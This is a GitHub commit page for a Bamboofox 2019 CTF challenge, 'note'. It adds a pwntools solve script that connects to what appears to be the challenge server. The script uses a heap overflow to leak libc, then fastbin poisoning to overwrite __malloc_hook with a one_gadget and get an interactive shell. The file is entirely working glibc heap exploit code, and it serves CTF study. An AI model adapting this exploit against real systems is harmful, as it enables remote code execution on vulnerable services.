Commit 39fec18

committed

glibc heap

1 parent fd92085 commit 39fec18Copy full SHA for 39fec18

File tree

4 files changed

+107

-0

lines changed

Bamboofox2019_note

4 files changed

+107

-0

lines changed

`‎Bamboofox2019_note/libc-2.27.so‎`

1.94 MB

Binary file not shown.

`‎Bamboofox2019_note/note‎`

12.9 KB

Binary file not shown.

`‎Bamboofox2019_note/note.i64‎`

186 KB

Binary file not shown.

`‎Bamboofox2019_note/solve.py‎`

Lines changed: 107 additions & 0 deletions

Original file line number	Diff line number	Diff line change
`@@ -0,0 +1,107 @@`
	`1`	`+#!/usr/bin/env python3`
	`2`	`+# -- coding: utf-8 --`
	`3`	`+`
	`4`	`+from pwn import *`
	`5`	`+from time import sleep`
	`6`	`+context.log_level = "critical"`
	`7`	`+context.binary = "./note"`
	`8`	`+libc = context.binary.libc`
	`9`	`+libc.sym['main_arena'] = 0x3ebc40`
	`10`	`+libc.sym['one_gadget'] = 0x4f2c5`
	`11`	`+`
	`12`	`+# io = process("./note")`
	`13`	`+io = remote("34.82.101.212", 10001)`
	`14`	`+`
	`15`	`+def add(size):`
	`16`	`+ io.sendlineafter(": ", "1")`
	`17`	`+ io.sendlineafter(": ", str(size))`
	`18`	`+`
	`19`	`+def edit(idx, cont):`
	`20`	`+ io.sendlineafter(": ", "2")`
	`21`	`+ io.sendlineafter(": ", str(idx))`
	`22`	`+ io.sendafter(": ", cont)`
	`23`	`+ sleep(0.01)`
	`24`	`+`
	`25`	`+def show(idx):`
	`26`	`+ io.sendlineafter(": ", "3")`
	`27`	`+ io.sendlineafter(": ", str(idx))`
	`28`	`+`
	`29`	`+def copy(src, dst):`
	`30`	`+ io.sendlineafter(": ", "4")`
	`31`	`+ io.sendlineafter(": ", str(src))`
	`32`	`+ io.sendlineafter(": ", str(dst))`
	`33`	`+`
	`34`	`+def delete(idx):`
	`35`	`+ io.sendlineafter(": ", "5")`
	`36`	`+ io.sendlineafter(": ", str(idx))`
	`37`	`+`
	`38`	`+def DEBUG():`
	`39`	`+ cmd = '''`
	`40`	`+ bpie 0xDE8`
	`41`	`+ bpie 0xE6E`
	`42`	`+ bpie 0xB08`
	`43`	`+ c`
	`44`	`+ '''`
	`45`	`+ gdb.attach(io, cmd)`
	`46`	`+ sleep(0.5)`
	`47`	`+`
	`48`	`+add(0x400)`
	`49`	`+add(0x20)`
	`50`	`+add(0x60)`
	`51`	`+add(0x3f0)`
	`52`	`+`
	`53`	`+edit(0, '0' * 0x3ff)`
	`54`	`+edit(2, flat(0x21) * int(0x50 / 0x8))`
	`55`	`+edit(3, flat(0x21) * int(0x3e0 / 0x8))`
	`56`	`+`
	`57`	`+copy(0, 1)`
	`58`	`+`
	`59`	`+edit(1, flat('0' * 0x28, 0x451))`
	`60`	`+delete(2)`
	`61`	`+`
	`62`	`+show(1)`
	`63`	`+libc.address = u64(io.recvuntil("\x7f")[-6: ] + b'0円0円') - libc.sym['main_arena'] - 96`
	`64`	`+print("libc @ {:#x}".format(libc.address))`
	`65`	`+`
	`66`	`+add(0x10)`
	`67`	`+edit(1, flat('0' * 0x28, flat(0x71)))`
	`68`	`+delete(2)`
	`69`	`+`
	`70`	`+add(0x10)`
	`71`	`+edit(1, flat('0' * 0x48, flat(0x71)))`
	`72`	`+delete(2)`
	`73`	`+`
	`74`	`+add(0x10)`
	`75`	`+edit(1, flat('0' * 0x68, flat(0x71)))`
	`76`	`+delete(2)`
	`77`	`+`
	`78`	`+add(0x10)`
	`79`	`+edit(1, flat('0' * 0x88, flat(0x71)))`
	`80`	`+delete(2)`
	`81`	`+`
	`82`	`+add(0x10)`
	`83`	`+edit(1, flat('0' * 0xa8, flat(0x71)))`
	`84`	`+delete(2)`
	`85`	`+`
	`86`	`+add(0x10)`
	`87`	`+edit(1, flat('0' * 0xc8, flat(0x71)))`
	`88`	`+delete(2)`
	`89`	`+`
	`90`	`+add(0x10)`
	`91`	`+edit(1, flat('0' * 0xe8, flat(0x71)))`
	`92`	`+delete(2)`
	`93`	`+`
	`94`	`+add(0x68)`
	`95`	`+delete(2)`
	`96`	`+edit(1, flat('0' * 0x108, 0x71, libc.sym['__malloc_hook'] - 0x23))`
	`97`	`+`
	`98`	`+`
	`99`	`+add(0x68)`
	`100`	`+add(0x68)`
	`101`	`+`
	`102`	`+edit(4, flat('0円' * 0xb, libc.sym['one_gadget'], libc.sym['__libc_realloc'] + 9))`
	`103`	`+`
	`104`	`+# DEBUG()`
	`105`	`+add(0)`
	`106`	`+`
	`107`	`+io.interactive()`

0 commit comments

Comments

(0)

Navigation Menu

Search code, repositories, users, issues, pull requests...

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Commit 39fec18

File tree

4 files changed

4 files changed

`‎Bamboofox2019_note/libc-2.27.so‎`

`‎Bamboofox2019_note/note‎`

`‎Bamboofox2019_note/note.i64‎`

`‎Bamboofox2019_note/solve.py‎`

0 commit comments